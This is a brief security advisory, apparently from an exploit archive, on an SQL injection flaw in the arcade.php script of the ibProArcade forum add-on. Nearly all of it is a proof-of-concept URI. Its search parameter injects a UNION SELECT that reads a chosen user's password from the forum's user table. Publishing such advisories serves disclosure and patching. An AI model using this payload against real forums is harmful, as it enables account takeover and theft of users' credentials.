|
ibProArcade Arcade.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a web client. The following proof-of-concept URI is available: http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /* |
|
Privacy Statement |